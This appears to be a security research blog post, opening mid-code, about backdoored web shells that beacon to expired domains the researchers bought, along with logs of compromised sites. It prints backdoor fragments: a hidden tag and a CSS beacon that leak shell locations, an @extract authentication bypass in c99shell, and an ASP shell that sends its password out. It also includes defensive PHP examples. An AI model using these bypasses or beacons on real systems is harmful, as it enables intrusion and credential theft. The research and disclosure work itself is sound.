Backdooring Your Backdoors – Another $20 Domain, More Governments


'; // closes the string holding the zero-size HTML tag whose source points at rst.void.ru
echo ws(2)."".date("d-m-Y H:i:s")."";

This code produces an HTML tag with a zero size, fetching a file from 'rst.void.ru' (a domain owned by the creators of the r57shell) to – apparently – send the current version string of the shell in use to the script maintainers. Seems innocent enough, right?

In truth, though, this leaks the location of the newly-deployed web shell to the owners of rst.void.ru via the HTTP request's Referer header – and so after hours of cyber intrusion away at your target, you have just handed over your newly-acquired shell to someone smarter than you – the bigger fish, per se.

The food chain is alive, and you hopefully get the idea.

I’m A Security Professional, I Always Configure Auth

A lot of web shells come with password protection, allowing the attacker to restrict access to themselves only. Surprise surprise, though – a common feature of these backdoors is one that allows the original author of the web shell (in addition to the current attacker) to gain access to any host running the web shell with what effectively acts as a 'skeleton key'.

A great (historic) example is the above-mentioned c99shell backdoor. While this is not new, or novel, and has been discussed for years – we are detailing it for background context, in the hope of painting a clear picture.

Take a look for yourself…

$login = ""; //login
$pass = ""; //password
$md5_pass = ""; //md5-crypted pass. if null, md5($pass)

...

@extract($_REQUEST["c99shcook"]);

...

 if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
 {
 ...
  header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\"");
  header("HTTP/1.0 401 Unauthorized");
  exit($accessdeniedmess);
 }
} // closes the enclosing if (!empty($login)) block

At first glance, this is pretty straightforward stuff. The login and password are hardcoded at the top of the code (intended to be customised by the attacker before deploying the shell) in the $login and $pass variables.

Later on, a standard comparison with PHP_AUTH_USER and PHP_AUTH_PW performs the authentication check, exiting if they don't match. Fairly standard, right?

But what about that innocent-looking @extract? Well, according to php.net, that function isn't 'safe' for use on untrusted data.

The extract function is designed to accept input in the form of key/value pairs, and then use them to overwrite variables in the current scope.

This means that a criminal targeting criminals can simply supply a c99shcook request parameter (GET or POST) containing a variable named md5_pass with a value set to their own password and login set to a username of their choice. This will then overwrite the hardcoded credential variables and allow the 'bigger fish' attacker to bypass authentication.
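As an added illustration of the variable-overwrite bug class behind that @extract line (this is not code from the post or from c99shell), the script below emulates the gate with plain arrays standing in for $_REQUEST and $_SERVER, and shows the safe form: copy only allowlisted keys into a dedicated array instead of letting request data name variables. The credentials and parameter values are constructed.

```php
<?php
// Added example, not c99shell code: how extract() on request data clobbers
// locals defined just above it, and how to take the same input safely.
// Plain arrays replace $_REQUEST / $_SERVER so this runs from the CLI.

function credentials_match(array $server, string $login, string $md5_pass): bool
{
    return ($server['PHP_AUTH_USER'] ?? '') === $login
        && md5($server['PHP_AUTH_PW'] ?? '') === $md5_pass;
}

// Mirrors the fragment above: "hardcoded" credentials, then extract() on request data.
function gate_vulnerable(array $request, array $server): bool
{
    $login    = 'operator';             // constructed; set by whoever deployed the shell
    $md5_pass = md5('operator-secret');
    if (isset($request['c99shcook']) && is_array($request['c99shcook'])) {
        // Default flag is EXTR_OVERWRITE: keys named login / md5_pass silently
        // replace the two locals defined above. This is the skeleton key.
        @extract($request['c99shcook']);
    }
    return credentials_match($server, $login, $md5_pass);
}

// Safe form: request data never names variables. Only known keys are copied
// into a dedicated array. (EXTR_SKIP would protect existing locals too, but
// still lets the caller create arbitrary new variables in scope.)
function gate_hardened(array $request, array $server): bool
{
    $login    = 'operator';
    $md5_pass = md5('operator-secret');
    $prefs = [];
    foreach (['theme', 'lang'] as $key) {            // explicit allowlist
        $prefs[$key] = $request['c99shcook'][$key] ?? null;
    }
    return credentials_match($server, $login, $md5_pass);
}

// Constructed inputs: a third party presenting credentials of their own choosing
// alongside a c99shcook parameter, versus the deployer using the real password.
$third_party = [
    'request' => ['c99shcook' => ['login' => 'x', 'md5_pass' => md5('x')]],
    'server'  => ['PHP_AUTH_USER' => 'x', 'PHP_AUTH_PW' => 'x'],
];
$deployer = [
    'request' => [],
    'server'  => ['PHP_AUTH_USER' => 'operator', 'PHP_AUTH_PW' => 'operator-secret'],
];
echo "vulnerable, third party: ", var_export(gate_vulnerable($third_party['request'], $third_party['server']), true), "\n";
echo "hardened,   third party: ", var_export(gate_hardened($third_party['request'], $third_party['server']), true), "\n";
echo "hardened,   deployer:    ", var_export(gate_hardened($deployer['request'], $deployer['server']), true), "\n";
```

The vulnerable gate accepts the third party because extract() replaced $login and $md5_pass before the comparison ran; the hardened gate accepts only the deployer.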

I Can’t Believe It’s Not Backdoored

While this history was exciting for those of us that just enjoy living the halcyon days of an unpoliced Internet, we found ourselves in an uncomfortable position after .MOBI – would we ever get attention ever again?

Again, throwing logic and time into the wind, we started on a new hypothesis. Wouldn't it be cool if we could play with some of our older toys, but

  • With a different angle,
  • Call it research,
  • And just generally see what people are up to?

As we alluded to at the start of the post, we have really fallen in love with abandoned and expired infrastructure as a way to (legally) wreak havoc on the Internet and work out just how broken everything is.

As those of you who know the watchTowr team intimately will be aware, obsession is a very powerful force, and something of a theme amongst many team members – we often fixate on ideas, and will relentlessly find ways to verify our ideas until either we find a new obsession, or we do indeed prove ourselves to be correct.

Although the void.ru domain used in the r57shell backdoor is still being actively renewed by an "advertising agency" (lol??), we wondered – were they the only ones that had realised that hackers (and pentesters) very often download random code off the Internet, fire it at production systems and think they're Neo from the Matrix?

cough linpeas.sh you absolute muppets cough

Could we put ourselves in the middle of some of these backdoors, and add to our 'unofficial sysadmin' duties?

Spoiler: the answer is yes.

Adapting some internal code, we went on a mission – collect as many web shells as possible (regardless of language, target, or age), de-obfuscate any code that happened to be protected by the power of base64, and extract any unregistered domains likely used in some sort of callback function.

We then hooked that up to the AWS Route53 API, and just bought them en masse. Honestly, it's $20, and we've done worse with more.

Friends – we registered 40+ domains and began spinning up infrastructure. Below are some examples:

With shiny wildcard TLS certs, an automatically configured Apache web server (and ahem, a correctly disabled logrotate instance ahem ahem ahem ahem we definitely didn't mess this up and discard a bunch of logs ahem ahem ahem ahem ahem) – we pointed our shiny new domains at our logging server, which did nothing other than log incoming requests before responding with a 404.

Before the nerds in the audience start shouting at us, we have been very prudent here to remain within the boundaries of the law – these requests were coming to us, we didn't manipulate systems into communicating with us, and we certainly did not respond with code to be evaluated.

While we have a huge amount of data, and to walk through it all would be tedious for all involved, we wanted to highlight a few interesting things:

Hello North Korea?

What did we see? Well, first off, we saw someone cosplaying as Lazarus Group, aka APT37, aka North Korea. It seems unlikely that we've caught Lazarus in the act given the targets, but we're probably seeing some attackers who are repurposing the APT-level tooling used by Lazarus for their own ends.

Hey, if SSLVPN vendors can call path traversal sophisticated, then a web shell meets the bar to be described as APT-level tooling. Like sandcastles at the beach are often described as architecture.

Take a look at the following inbound requests:

img2.w2img.com/midia_img/0f000cbW0BuDik7If87T3s.gif 202.146.[redacted] 485 "http://www.[redacted].com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
img2.w2img.com/midia_img/0f000cbW0BuDik7If87T3s.gif 35.206.[redacted] - 404 466 "http://[redacted].cn/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
img2.w2img.com/midia_img/0f000cegVDnfw03Y33y936.gif 103.170.[redacted] - 404 466 "http://www.[redacted].net/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0"

We saw thousands of requests like this, fetching a .gif image from our logging server. But what do they represent?

Well, we were able to find a sample of the backdoor generating these requests (it fell off the back of a passing lorry). It seems to be a version of one used by Lazarus back in 2020.

If we take a closer look at the backdoor, and strip away some of the obfuscation, we can see the beaconing URL, being fetched as a .gif image from our server:

.menu{background:url(http://img2.w2img.com/midia_img/0f000cegVDnfw03Y33y936.gif);}

This is a line of CSS, specifying that the 'menu' style should fetch a background image from the given URL. On loading the page, the web browser will try to fetch the specified .gif file from the w2img.com server.

The attentive administrators (us!) are watching the logs keenly, and recognise this request – ultimately, having the effect of alerting us that the web shell has been deployed and accessed correctly, and leaking the URL to the panel on the compromised domain in the referrer.

Note: Disclosing just the domain in referrers is a relatively recent browser change, and indeed attackers using older browsers were sending us full shell URLs.

We saw over 3,900 unique compromised domains from this backdoor alone – clearly, this is a prolific tool.

.GOV Is Always Near

Taking a look through the results for high-value domains within our referrers, the following stood out like a shining beacon:

host# grep "\.gov" referrers | sort -u
http://www.[redacted].gov.cn/
https://fhc.gov.ng/
http://[redacted].court.gov.cn
http://[redacted].gov.bd

Uh, ok! fhc.gov.ng is the Federal High Court of Nigeria

As we can see from the logs below, this was across 4 different backdoors – therefore, 4 different web shells were responsible for capturing this information (indicated by the 4 different domains the requests were sent to).

[[redacted]  0000] http://img2.w2img.com:80/midia_img/0f000cegVDnfw03Y33y936.gif 175.176.[redacted] - 404 522 'http://www.[redacted].gov.cn/' 'Mozilla/5.0 (iPhone; CPU iPhone OS 17_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Mobile/15E148 Safari/604.1'
[[redacted]  0000] http://www.nettekiadres.com:443/imhabirligi.jpg 58.97.[redacted] - 404 3108 'https://fhc.gov.ng/' 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36'
[[redacted]  0000] h0ld-up.info:80/index.html 103.111.[redacted] - 200 342 "http://[redacted].gov.bd/[redacted].php" "Opera/10.61 (Linux i686; U; en-US) Presto/6.1.88 Version/2.2"
[[redacted]  0000] http://www.lpl38.com:443/post/http:/[redacted].court.gov.cn 117.136.[redacted] - 404 867 '-' 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36 EdgA/117.0.2045.53'
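For the counting and grepping described above (unique compromised domains per backdoor, and the .gov shortlist), here is an added example that is not watchTowr's own tooling: it parses log lines in the format shown, groups the leaked referrer hosts by the beacon domain they were sent to, and pulls out the .gov entries. The sample lines are constructed and the referrer hosts are placeholders.

```php
<?php
// Added example, not the post's tooling. Log format, one request per line:
// <requested url> <src ip> - <status> <bytes> <"referrer"> <"user-agent">
// Sample lines are constructed; the referrer hosts are made-up placeholders.
$sample_log = <<<'LOG'
img2.w2img.com/midia_img/a.gif 203.0.113.10 - 404 466 "http://www.example.com/" "Mozilla/5.0"
img2.w2img.com/midia_img/a.gif 203.0.113.11 - 404 466 "http://www.example.com/admin.php" "Mozilla/5.0"
http://img2.w2img.com:80/midia_img/b.gif 198.51.100.7 - 404 522 'http://portal.example.gov.cn/' 'Mozilla/5.0'
www.nettekiadres.com:443/imhabirligi.jpg 198.51.100.8 - 404 3108 'https://court.example.gov.ng/' 'Mozilla/5.0'
h0ld-up.info:80/index.html 192.0.2.5 - 200 342 "http://shop.example.net/x.php" "Opera/10.61"
www.lpl38.com:443/post/x 192.0.2.6 - 404 867 '-' 'Mozilla/5.0'
LOG;

// Returns ['beacon' => host the request was sent to, 'referrer_host' => leaked host or null]
function parse_line(string $line): ?array
{
    if (!preg_match('/^(\S+)\s+\S+\s+\S+\s+\d+\s+\d+\s+(["\'])(.*?)\2\s+(["\'])(.*?)\4/', $line, $m)) {
        return null;
    }
    // Some loggers record a scheme and port, some do not; normalise before parse_url().
    $url = preg_match('#^https?://#', $m[1]) ? $m[1] : 'http://' . $m[1];
    $ref = $m[3] === '-' ? null : parse_url($m[3], PHP_URL_HOST);
    return ['beacon' => parse_url($url, PHP_URL_HOST), 'referrer_host' => $ref];
}

// beacon domain => sorted unique hosts that loaded it (i.e. the compromised sites)
function compromised_by_beacon(string $log): array
{
    $out = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $rec = parse_line($line);
        if ($rec === null || $rec['referrer_host'] === null) continue; // no referrer: nothing leaked
        $out[$rec['beacon']][$rec['referrer_host']] = true;
    }
    foreach ($out as &$hosts) { $hosts = array_keys($hosts); sort($hosts); }
    unset($hosts);
    return $out;
}

// The post's `grep "\.gov" referrers | sort -u`, applied to parsed hosts (gov and gov.<cc>)
function gov_hosts(array $byBeacon): array
{
    $gov = [];
    foreach ($byBeacon as $hosts) {
        foreach ($hosts as $h) if (preg_match('/\.gov(\.[a-z]{2})?$/', $h)) $gov[$h] = true;
    }
    $gov = array_keys($gov); sort($gov);
    return $gov;
}

$byBeacon = compromised_by_beacon($sample_log);
foreach ($byBeacon as $beacon => $hosts) printf("%s: %d compromised host(s)\n", $beacon, count($hosts));
print_r(gov_hosts($byBeacon));
```

Two hits from the same compromised site (different paths) count once, and the `'-'` referrer line contributes nothing, which is the behaviour you want when turning raw beacon logs into a notification list.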

The Cisco We Have At Home

Naturally, we took a look through our dataset for any high-profile targets. We found the following, which made us do a double-take:

img2.w2img.com:80/midia_img/0f000cegVDnfw03Y33y936.gif 110.66.[redacted] - 404 522 "http://www.ciscosoft.com.cn/[redacted].asp"

ciscosoft.com.cn?! We were somewhat relieved to discover this bears no relation to the American software giant, Cisco.

Give Me Everything

As we went through the data, we began to see another type of backdoor calling back – one that was far more explicit than loading an image file and relying on leaking the location in the referrer header. Specifically, we began to see functionality that would call back to actual logging functionality with specific information included within parameters.

For example, the below (this is one of many such logic implementations):

www.odayexp.com:80/sx/key.asp?url=http%3A%2F%2F[redacted]%2Fseek%2FCelebByConsortiaDayRiches%2Easp&p=[redacted] 43.230.[redacted] - 404 523 ".[redacted]:89/[redacted].asp" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36 Core/1.116.454.400 QQBrowser/13.2.6135.400"

This immediately piqued our interest – not only is the URL of the web shell being provided, but there is also a "mysterious" p parameter included.

What's being sent here? Well, let's first take a peek at the URL in the referrer.

It is, once again, a web shell, but this time there's a password:

To figure out what that p represents, we need to take a look at the code behind the web shell. It's in ASP, and the relevant part looks like this:


As you can see, it's lightly obfuscated. Once we strip out the obfuscation, we're left with the following:


This code once again embeds an image, fetching it from our logging server at www.odayexp.com. We can see how the p parameter is generated – it's simply the UserPass variable. Surprise surprise – this is the password required to log in to the web shell itself.

So to put it all together – the attacker tried to secure their web shell installation by requiring a password, but the web shell is backdoored to the extent that it broadcasts the password (in the clear!) to a logging server, odayexp, which is now owned by watchTowr.

This attacker gets half marks for securing their web shell at least. But sending us the password in plaintext? Not really on the 'best practices' list.

Another interesting thing is that, if we look back in our logs, we can again see the attacker presumably modifying and playing with this function – but still sending the data to a system they don't control?

www.odayexp.com:80/sx/key.asp?url="server.urlencode
www.odayexp.com:80/sx/key.asp?url=http://192.168.66.134
www.odayexp.com:80/sx/key.asp?url=http://192.168.66.140/fk.asp
www.odayexp.com:80/sx/key.asp?url=http://localhost/test/fuccck.asp
www.odayexp.com:80/sx/key.asp?url=http://localhost/test/fuccck.asp&p=admin

Alright then.

Hack. The. Planet.

While this has hopefully been a stroll down nostalgia lane for many (us, too) – our opinion is that as the Internet ages, and as we begin to truly understand the scope of impact of abandoned and expired infrastructure, we're likely to see problems like this continue.

Previously, it was an expired domain previously used as a WHOIS server serving a global TLD. Today, it is domains used in backdoors. What's next – software update infrastructure and autoscaling cloud infrastructure for SSLVPN appliances? That would be crazy.

We like to be semi-optimistic (actually this is a lie, but we do try) – it is somewhat encouraging to see that attackers make the same mistakes as defenders. It's easy to slip into the mindset that attackers never slip up, but we saw evidence to the contrary – boxes with open web shells, expired domains, and the use of software that has been backdoored. Perhaps the playing field is more level than we thought (Editor: or the intelligence spread far wider than expected?).

While it's noteworthy that the shells we observed were predominantly skewed toward Chinese targets (likely a reflection of our sample data set), we are also hesitant to draw conclusions based on source IP addresses (given the ease of proxying). That being said, we note a strong skew from Hong Kong and China IP address space as the source of presumed attacker traffic (or perhaps sysadmins with some very curious choices for website management).

So far we've found over 4000~ breached systems (three four of which are breached .gov systems). The number keeps going up – as you would expect.

In a similar vein to our previous .MOBI research, our concern is always around the responsibility that we find ourselves left holding. For the same reasons that both this research and the .MOBI research came to exist, we would be guilty of the exact same negligent disposal of infrastructure if we were to let these domains expire as their previous owners did. We're incredibly thankful for the help of The Shadowserver Foundation, who have agreed yet again to save us from our own adventures and to take ownership of the domains implicated in this research and sinkhole them.

At watchTowr, we fervently believe that continuous security testing is the future and that rapid response to emerging threats single-handedly prevents inevitable breaches.

With the watchTowr Platform, we hand over this capability to our clients every single day – it is our job to understand how emerging threats, vulnerabilities, and TTPs could impact their organizations, with precision.

If you'd like to learn more about the watchTowr Platform, our Attack Surface Management and Continuous Automated Red Teaming solution, please get in touch.
